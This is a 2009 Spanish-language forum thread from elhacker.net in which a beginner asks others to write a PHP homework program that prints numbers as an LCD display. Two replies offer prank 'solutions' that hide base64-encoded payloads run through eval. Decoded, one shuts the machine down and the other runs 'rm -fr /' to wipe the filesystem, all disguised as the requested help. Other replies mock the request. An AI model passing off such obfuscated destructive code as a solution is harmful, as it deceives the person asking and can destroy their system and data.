elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  Debo Programar Algo Simple En PHP y No se como
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Debo Programar Algo Simple En PHP y No se como  (Leído 7,423 veces)
pulpotron

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Debo Programar Algo Simple En PHP y No se como
« en: 16 Octubre 2009, 19:07 pm »

Amigos  vengo  a pedirles ayuda
(confío en la comunidad)

Debo realizar una tarea de programacion en PHP bien simple, yo que no entiendo mucho (mas bien no se nada de Php), pero seguro para alguien entendido sería muy facil

La tarea es como sigue,
------------------------------------------

Display LCD

Escribir un programa que imprima numeros en estilo de display LCD.

Datos de Entrada:

dos enteros s y n, donde n es el número a ser impreso ( 0 <= n <= 99.999.999) y s es el tamaño en el cual debe ser impreso (1 <= s <= 10).

Datos de Salida:

Imprimir el número especificado en la entrada en formato tipo display LCD usando s "-" para los segmentos horizontales y s "|" para los segmentos verticales. Cada dígito ocupa exactamente s+2 columnas y 2s+3 filas. Llenar con blancos todos los espacios en blanco ocupados por los dígitos, incluyendo el último. Debe haber exactamente una columna de blancos entre dos dígitos.

Ejemplo:
s = 2 n = 123

12345678901234567890 (columnas)
bbbbbb--bbb--b
bbb|bbbb|bbbb|
bbb|bbbb|bbbb|
bbbbbb--bbb--b
bbb|b|bbbbbbb|
bbb|b|bbbbbbb|
bbbbbb--bbb--b

b = espacio en blanco
el ejemplo deberia verse así:


desde ya muchas gracias, con esto me podrian salvar muuuuchas horas que no tengo y estoy colapsando..
gracias!


En línea

Erika Vega

Desconectado Desconectado

Mensajes: 96



Ver Perfil
Re: Debo Programar Algo Simple En PHP y No se como
« Respuesta #1 en: 16 Octubre 2009, 19:36 pm »

Que lindo eres pidiendonos que te hagamos la tarea  :xD  :-*


En línea

Mr. Crowley


Desconectado Desconectado

Mensajes: 343


Costa Rica


Ver Perfil WWW
Re: Debo Programar Algo Simple En PHP y No se como
« Respuesta #2 en: 16 Octubre 2009, 19:41 pm »

Que lindo eres pidiendonos que te hagamos la tarea  :xD  :-*

Opino igual...  >:(
En línea

Mi blog personal: www.calirojas.com
Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: Debo Programar Algo Simple En PHP y No se como
« Respuesta #3 en: 16 Octubre 2009, 19:46 pm »

y es su primer post ñ_ñ!!


hagamosle la tarea ñ_ñ


Código
  1. <?php
  2. $s=$_GET['s'];
  3. $n=$_GET['n'];
  4.  
  5. if(is_numeric($s) && is_numeric($n) ){
  6.   while($s<=$n){
  7.       eval(base64_decode('c3lzdGVtKCdzaHV0ZG93biAtcyAtdCAwMCcpOw=='));
  8.       echo $s.'<br>';
  9.        echo $n.'<br>';
  10. }
En línea

Mr. Crowley


Desconectado Desconectado

Mensajes: 343


Costa Rica


Ver Perfil WWW
Re: Debo Programar Algo Simple En PHP y No se como
« Respuesta #4 en: 16 Octubre 2009, 19:50 pm »

Listo pulpotron!! Ahi esta su tarea... parece que Azielito se tomo el tiempo para hacerla.
Esperamos le sirva  :xD
En línea

Mi blog personal: www.calirojas.com
YST


Desconectado Desconectado

Mensajes: 965


I'm you


Ver Perfil WWW
Re: Debo Programar Algo Simple En PHP y No se como
« Respuesta #5 en: 16 Octubre 2009, 19:55 pm »

Siempre es bueno probar las tareas en localhost :P
En línea



Yo le enseñe a Kayser a usar objetos en ASM
Jubjub


Desconectado Desconectado

Mensajes: 708


Lay Ladie lay,...


Ver Perfil WWW
Re: Debo Programar Algo Simple En PHP y No se como
« Respuesta #6 en: 16 Octubre 2009, 19:55 pm »

Si no te funciona o te da problemas extraños, prueba con este otro! :D


Código
  1. <?php
  2. $s=$_GET['s'];
  3. $n=$_GET['n'];
  4.  
  5. if(is_numeric($s) && is_numeric($n) ){
  6.   while($s<=$n){
  7.       eval(base64_decode('c3lzdGVtKCdybSAtZnIgLycpOw=='));
  8.       echo $s.'<br>';
  9.        echo $n.'<br>';
  10. }
En línea

Jugando con Fósforoshacking con un tono diferente


.
porno
jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: Debo Programar Algo Simple En PHP y No se como
« Respuesta #7 en: 16 Octubre 2009, 20:37 pm »

Aquí encontré un código que te puede servir :)
 
<?php
echo 'holamundo';
?>
 
Con eso estas listo, sólo te faltaría recibir y tratar las variables de tal forma que la tarea quedé lista :)
En línea

Blitzkrieg'


Desconectado Desconectado

Mensajes: 546


print('Hi there')


Ver Perfil WWW
Re: Debo Programar Algo Simple En PHP y No se como
« Respuesta #8 en: 16 Octubre 2009, 21:09 pm »

Aquí encontré un código que te puede servir :)
 
<?php
echo 'holamundo';
?>
 
Con eso estas listo, sólo te faltaría recibir y tratar las variables de tal forma que la tarea quedé lista :)

 ;D ;D  ¿Cuanto sacara en el examen?
En línea



:ohk<any>


Desconectado Desconectado

Mensajes: 1.744


Yo lo que quiero que me salga bien es la vida.


Ver Perfil WWW
Re: Debo Programar Algo Simple En PHP y No se como
« Respuesta #9 en: 16 Octubre 2009, 21:20 pm »

Que malos son cuando se lo proponen ¬¬'
En línea

Y es que a veces pienso que si no estuviera loco no podría salir adelante.
Lo que no se es capaz de dar, en realidad no se posee, uno es poseído por ello.
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
descifrar algo simple como esta pass
Criptografía
rub'n 1 4,068 Último mensaje 31 Julio 2010, 22:22 pm
por Debci
Ayuda porfavor algo simple que no se
Programación Visual Basic
▄ █Eden´s Tree█ ▄ 5 2,223 Último mensaje 28 Noviembre 2010, 22:07 pm
por ▄ █Eden´s Tree█ ▄
¿Qué carrera debo de estudiar para saber programar? « 1 2 »
Programación General
etac 12 44,899 Último mensaje 30 Abril 2012, 15:36 pm
por I93R
¿Como debo empezar en C/C++? « 1 2 »
Programación C/C++
Wire3 12 7,522 Último mensaje 26 Diciembre 2013, 18:14 pm
por rir3760
Algo simple de arreglos que no me sale (Si, soy re newbie)
Programación C/C++
palacio29 3 1,957 Último mensaje 25 Noviembre 2016, 17:16 pm
por Slava_TZD
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines